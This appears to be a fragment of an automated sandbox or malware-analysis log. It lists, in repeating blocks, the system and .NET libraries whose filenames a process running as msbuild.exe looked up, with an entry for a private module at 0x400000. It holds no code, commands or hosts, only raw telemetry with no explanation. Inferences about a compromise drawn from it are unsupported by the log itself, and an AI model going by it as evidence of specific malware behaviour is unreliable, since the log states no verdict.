Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
